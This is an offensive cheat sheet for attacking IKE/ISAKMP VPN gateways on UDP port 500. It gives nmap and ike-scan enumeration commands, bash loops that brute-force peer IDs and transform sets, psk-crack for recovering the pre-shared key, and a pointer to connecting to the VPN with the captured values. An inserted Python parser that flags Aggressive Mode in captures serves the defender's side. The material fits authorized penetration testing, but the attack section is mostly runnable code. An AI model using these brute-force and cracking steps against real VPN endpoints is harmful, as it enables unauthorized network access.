Notes
| Alternative Ports |
|---|
| 4500 (NAT-T) |
Service Description
UDP port 500 is used by ISAKMP (Internet Security Association and Key Management Protocol), commonly seen with IKE (Internet Key Exchange) as part of IPSec VPNs. It negotiates Security Associations (SAs) and handles peer authentication and cryptographic key exchange. This is typically the first point of interaction in VPN setups, and is a target for identifying VPN gateways, user identities, and misconfigurations.
Remember
To abuse Aggressive Mode you need to find both a valid ID and transform set to elicit the PSK.
Attacks
Aggressive Mode Identity Leak
When IKEv1 is configured in Aggressive Mode, the responder may leak the peer ID and a hash derived from the pre-shared key in the clear, allowing offline dictionary attacks against the PSK.
Brute-force of Peer ID and PSK
If the peer ID is guessable and Aggressive Mode is enabled, attackers can brute-force both the ID and the PSK to obtain VPN access.
Vendor-Specific Behavior (e.g. Cisco)
Cisco devices often require both an exact match of peer ID and proposal before responding with a hash. Even in Aggressive Mode, many Cisco appliances will not return a hash without full parameter alignment.
Tools & Exploits
Enumeration
nmap
Initial probe to confirm IKE/ISAKMP service.
```bash
nmap -sU -p500 --script ike-version <target-ip>
```
ike-scan
Performs IKE discovery, aggressive mode testing, ID brute-forcing, and hash capture.
```bash
# Basic discovery
ike-scan <target-ip>
# Aggressive Mode with known ID
ike-scan --aggressive --id=myid --pskcrack <target-ip>
```
Brute-force ID Script
```bash
while read -r id; do
  ike-scan --aggressive --id="$id" --pskcrack <target-ip>
done < idlist.txt
```
Transform Brute-force Script
```bash
for trans in "1,2,1,1" "3,2,1,2" "5,2,1,2"; do
  ike-scan --aggressive --id=validid --trans="$trans" <target-ip>
done
```
strongSwan
Used to simulate or connect to VPN endpoints with known configuration.
```bash
apt install strongswan -y
```
Exploitation or Post-Enum
psk-crack
Cracks PSK from hash returned by ike-scan.
```bash
psk-crack psk-hash-output.txt
```
VPN access (if PSK and ID valid)
Use strongSwan or OpenVPN with captured/guessed values.
Wireshark Analysis Tips
Filters
```
udp.port == 500
isakmp
ip.addr == <target-ip> && udp.port == 500
```
What to look for:
- Exchange Type = 4 → Aggressive Mode
- SA and ID Payloads → sent in clear
- Notify: NO_PROPOSAL_CHOSEN → proposal rejected
- Valid hash returned → transform and ID accepted
- Identification payload → look for fields like `ID Type: FQDN` and `ID Data: vpn.company.com`
Transform ID Mapping
| Crypto Component | Wireshark ID | ike-scan ID |
|---|---|---|
| 3DES-CBC | 5 | 3 |
| AES-CBC | 7 | 5 |
| SHA1 | 2 | 2 |
| MD5 | 1 | 1 |
| PSK | 1 | 1 |
| MODP 768 | 1 | 1 |
| MODP 1024 | 2 | 2 |
| MODP 1536 | 5 | 5 |
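Added example (not part of the original notes) that applies the Wireshark tips and the Transform ID Mapping above from the defender's side: a small Python parser for a raw ISAKMP datagram from a UDP 500 capture that flags Exchange Type 4 (Aggressive Mode) and decodes the proposed transform attributes into names using the Wireshark ID column. The payload offsets follow the IKEv1/ISAKMP header and SA/proposal/transform layout, which is assumed here rather than taken from the page, and the sample packet is constructed inline, not a real capture.

```python
import struct

ATTR_NAMES = {1: "enc", 2: "hash", 3: "auth", 4: "group"}   # IKEv1 SA attribute types
ATTR_VALUES = {"enc": {5: "3DES-CBC", 7: "AES-CBC"}, "hash": {1: "MD5", 2: "SHA1"},   # Wireshark IDs
               "auth": {1: "PSK"}, "group": {1: "MODP 768", 2: "MODP 1024", 5: "MODP 1536"}}

def parse_transform(body):
    """Decode the attribute TLVs of one IKEv1 transform payload (bytes after its 8-byte header)."""
    attrs, pos = {}, 0
    while pos + 4 <= len(body):
        af_type, val = struct.unpack_from("!HH", body, pos)
        if af_type & 0x8000:          # basic attribute: the 2-byte value follows directly
            name = ATTR_NAMES.get(af_type & 0x7FFF)
            if name:
                attrs[name] = ATTR_VALUES[name].get(val, f"unknown({val})")
            pos += 4
        else:                         # variable-length attribute (e.g. lifetime): skip it
            pos += 4 + val
    return attrs

def inspect_isakmp(pkt):
    """Return exchange type, an aggressive-mode flag and the proposed transforms of one datagram."""
    next_payload, exch_type = pkt[16], pkt[18]          # fixed 28-byte ISAKMP header
    result = {"exchange_type": exch_type, "aggressive": exch_type == 4, "transforms": []}
    pos = 28
    while next_payload and pos + 4 <= len(pkt):
        ptype = next_payload
        next_payload, _, plen = struct.unpack_from("!BBH", pkt, pos)
        if ptype == 1:                                  # SA payload: DOI(4) + situation(4) + proposals
            ppos = pos + 12
            while ppos + 8 <= pos + plen:
                _, _, pr_len, _, _, spi_size, n_trans = struct.unpack_from("!BBHBBBB", pkt, ppos)
                tpos = ppos + 8 + spi_size
                for _ in range(n_trans):
                    _, _, tlen = struct.unpack_from("!BBH", pkt, tpos)
                    result["transforms"].append(parse_transform(pkt[tpos + 8:tpos + tlen]))
                    tpos += tlen
                ppos += pr_len
        pos += plen
    return result

def build_sample_aggressive():
    """Constructed sample, not a real capture: IKEv1 Aggressive Mode message with one SA proposal."""
    attrs = struct.pack("!HHHHHHHH", 0x8001, 7, 0x8002, 2, 0x8003, 1, 0x8004, 5)   # AES, SHA1, PSK, MODP1536
    attrs += struct.pack("!HHHHI", 0x800B, 1, 0x000C, 4, 28800)                   # lifetime, variable-length
    transform = struct.pack("!BBHBBH", 0, 0, 8 + len(attrs), 1, 1, 0) + attrs
    proposal = struct.pack("!BBHBBBB", 0, 0, 8 + len(transform), 1, 1, 0, 1) + transform
    sa = struct.pack("!BBHII", 0, 0, 12 + len(proposal), 1, 1) + proposal
    hdr = struct.pack("!8s8sBBBBII", b"\x01" * 8, b"\x00" * 8, 1, 0x10, 4, 0, 0, 28 + len(sa))
    return hdr + sa
```

Feed it the UDP payload of each port 500 datagram; an `aggressive` result with a `PSK` auth method is exactly the condition the notes above describe as exploitable.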
Manual Transform Testing:
```bash
ike-scan --aggressive --id=your_id --trans=3,1,1,2 <target-ip> # MD5
ike-scan --aggressive --id=your_id --trans=5,2,1,2 <target-ip> # AES
ike-scan --aggressive --id=your_id --trans=3,2,1,1 <target-ip> # MODP768
ike-scan --aggressive --id=your_id --trans=3,2,1,5 <target-ip> # MODP1536
```
Scripted Transform Brute-force:
```bash
#!/bin/bash
TARGET="$1"
ID="$2"
if [[ -z "$TARGET" || -z "$ID" ]]; then
  echo "Usage: $0 <target-ip> <valid-id>"
  exit 1
fi
transforms=(
  "1,2,1,1"
  "1,2,1,2"
  "1,1,1,2"
  "3,2,1,2"
  "5,2,1,1"
  "5,2,1,2"
  "5,1,1,2"
  "5,2,1,5"
)
for trans in "${transforms[@]}"; do
  echo -e "\n[*] Trying transform: $trans"
  ike-scan --aggressive --id="$ID" --trans="$trans" "$TARGET"
done
```